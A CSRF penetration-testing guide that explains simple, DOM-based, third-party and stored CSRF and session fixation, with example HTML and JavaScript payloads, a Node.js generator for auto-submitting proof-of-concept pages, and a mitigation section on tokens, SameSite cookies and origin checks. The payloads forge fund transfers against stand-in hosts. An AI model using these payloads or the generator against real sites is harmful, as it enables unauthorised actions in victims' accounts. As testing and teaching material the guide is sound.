Cross-Site Request Forgery (CSRF) Pen-Testing Guide

Table of Contents

  1. Introduction
  2. Identification Methods
  3. Mitigation
  4. References

Introduction

Cross-Site Request Forgery (CSRF) is an attack in which a page the attacker controls causes the victim's browser to send a request to a web application the victim is logged in to. The browser attaches the victim's credentials (session cookie, HTTP authentication) automatically, so the application processes the request as if the user had intended it. This document lists ways of identifying the common CSRF variants and the controls that stop them.

Identification Methods

Simple CSRF tricks the victim's browser into sending a pre-built, state-changing request, usually from a page the attacker hosts or a link in an email. To perform it, craft an HTML form or image request aimed at the application's endpoint and load it from another origin while holding a valid session. To identify candidates, look for state-changing requests that are authenticated by the session cookie alone: no unpredictable, session-bound token in the body or a custom header, no SameSite restriction on the cookie, and no Origin or Referer validation. Example payload (as written, the victim has to click Submit; an auto-submitting variant removes that requirement):

```html
<!-- Cross-site form targeting a state-changing POST endpoint -->
<form action="http://target.com/transfer" method="POST">
  <input type="hidden" name="amount" value="1000">
  <input type="hidden" name="recipient" value="attacker_account">
  <input type="submit" value="Submit">
</form>
```
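As an added example (not code from the original guide), the Node.js script below builds the proof-of-concept page from a request captured in the proxy. It covers both shapes used in this guide: a POST becomes an auto-submitting form so no click is needed, and a state-changing GET (the hidden-image payloads shown later under third-party and stored CSRF) becomes an `<img>` tag. Values are escaped for HTML attributes so a captured parameter cannot break the page. The URL and parameters are constructed samples.

```javascript
// Added example, not part of the original guide. Generates a CSRF PoC page
// from a captured request. Sample URLs and parameters are constructed.

// Escape for use inside an HTML attribute value.
const escapeHtml = (s) =>
  String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));

// method: 'GET' or 'POST'; url: absolute endpoint; params: object of body or
// query parameters as captured. Returns the HTML to host on the attacker site.
function buildCsrfPoc({ method, url, params }) {
  const m = String(method).toUpperCase();
  if (m === 'GET') {
    // State-changing GET: a hidden image fires the request with the victim's
    // cookies attached and needs no interaction at all.
    const qs = new URLSearchParams(params).toString();
    const sep = url.includes('?') ? '&' : '?';
    return `<img src="${escapeHtml(url + (qs ? sep + qs : ''))}" style="display:none" alt="">`;
  }
  if (m === 'POST') {
    const inputs = Object.entries(params)
      .map(([k, v]) => `  <input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}">`)
      .join('\n');
    return [
      `<form id="csrf" action="${escapeHtml(url)}" method="POST" enctype="application/x-www-form-urlencoded">`,
      inputs,
      '</form>',
      // Submit as soon as the page loads: the victim only has to visit it.
      '<script>document.getElementById("csrf").submit();</script>',
    ].join('\n');
  }
  // PUT/DELETE or JSON bodies cannot be sent by a plain HTML form; they need a
  // fetch() with credentials and are subject to CORS preflight, so a plain
  // form PoC does not apply.
  throw new Error(`unsupported method for a form-based PoC: ${method}`);
}

module.exports = { buildCsrfPoc, escapeHtml };
```

Usage: `buildCsrfPoc({ method: 'POST', url: 'http://target.com/transfer', params: { amount: '1000', recipient: 'attacker_account' } })` returns the page to host; open it in a browser that holds a session on the target and watch the proxy for the forged request.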

Session Fixation is a session-management flaw rather than a form of CSRF, but it is usually tested in the same pass because both abuse the way the browser carries the session. The attacker plants a session identifier they already know (through a URL parameter, a cookie set from a subdomain, or an injected meta tag) before the victim logs in, then reuses that identifier once the victim has authenticated. To detect it, check whether the application accepts a client-supplied session identifier, and whether the identifier is the same before and after login; an application that issues a fresh identifier on authentication and invalidates the old one is not affected. Example payload:

```html
<!-- Forces a known session identifier onto the victim before they log in -->
<a href="http://target.com/login?session=attacker_session_id">Login Here</a>
```

CSRF with DOM-based attacks uses client-side script rather than static HTML to build and send the forged request. On the attacker's own page this simply means auto-submitting a form or calling fetch() with credentials included, which removes the need for a click. If the script runs inside the target origin instead (through a reflected, stored or DOM-based XSS), it can first read the anti-CSRF token from the page and include it, so token-based defences no longer help and the finding should be reported as XSS with CSRF impact. To detect it, review client-side code for DOM sinks (innerHTML, location, eval, document.write) fed from attacker-controlled sources such as location.hash or postMessage, and check whether user-visible actions can be triggered by script without the user's intent. Example payload (submitting a form that is already present in the DOM):

```javascript
// Submits an existing form without any user interaction
document.getElementById('target_form').submit();
```

CSRF with third-party services targets an external service where the victim holds a session, such as a payment API, an identity provider or a SaaS admin panel, rather than the application under test; the application may merely be the page that carries the payload. To perform it, build requests to the third-party endpoints that the victim's browser will send with its cookies attached. To detect it, map every integration the application uses and check whether its state-changing actions can be triggered by a cross-site request without a token or re-authentication. A state-changing GET endpoint, as in the example, is the easiest case because a hidden image triggers it:

```html
<!-- Hidden image that fires a state-changing GET against a third-party service -->
<img src="http://thirdparty.com/api/transfer?amount=1000&recipient=attacker" style="display:none">
```

Stored CSRF places the payload on the target application itself, for example in a profile field, comment, message or uploaded file name that is rendered for other users, so every user who views the content fires the request. It is more dangerous than the reflected form because the request originates from the application's own origin: SameSite cookies, Origin or Referer checks and "do not click untrusted links" advice do not block it, and only an unpredictable, server-validated token does. To detect it, inject image or form markup into user-controlled content that other users will see and check whether rendering it triggers the action. Example payload:

```html
<!-- Stored in user content; every viewer's browser sends the request with their own cookies -->
<img src="http://target.com/transfer?amount=1000&recipient=attacker" style="display:none">
```

Mitigation

  1. Use CSRF Tokens: Include an unpredictable token in every state-changing form or request and validate it on the server, rejecting the request when it is missing or wrong. The token must be bound to the user's session; a fresh token per request is stronger but a per-session token is acceptable. Never compare it with string equality that can leak timing, and never send it in a URL where it lands in logs and Referer headers.
  2. SameSite Cookies: Set SameSite=Lax or SameSite=Strict on the session cookie so the browser omits it from cross-site requests. Lax still sends the cookie on top-level GET navigations, so no GET endpoint may change state; treat SameSite as defence in depth, not the only control, since it does not stop stored (same-site) CSRF.
  3. Double Submit Cookies: Send the token both in a cookie and in the request body or a custom header, and reject the request unless the two match. Prefer the signed variant, where the cookie value is an HMAC over the session identifier, so a subdomain that can set cookies cannot plant a matching pair.
  4. Origin and Referer Validation: Compare the Origin header (or Referer when Origin is absent) against the site's own origin, parsing the full origin rather than looking for a substring, which is bypassed by names such as target.com.attacker.net. A browser will not let an attacker's page forge these headers, but they may be absent because of privacy settings or a Referrer-Policy, so decide explicitly whether a missing header is rejected (fail closed) or tolerated. Use this as a secondary check beside tokens, not instead of them.
  5. User Interaction Verification: For critical actions such as password changes, payment details or transfers, require something the attacker's page cannot supply: re-entering the password, a one-time code, or a CAPTCHA.

References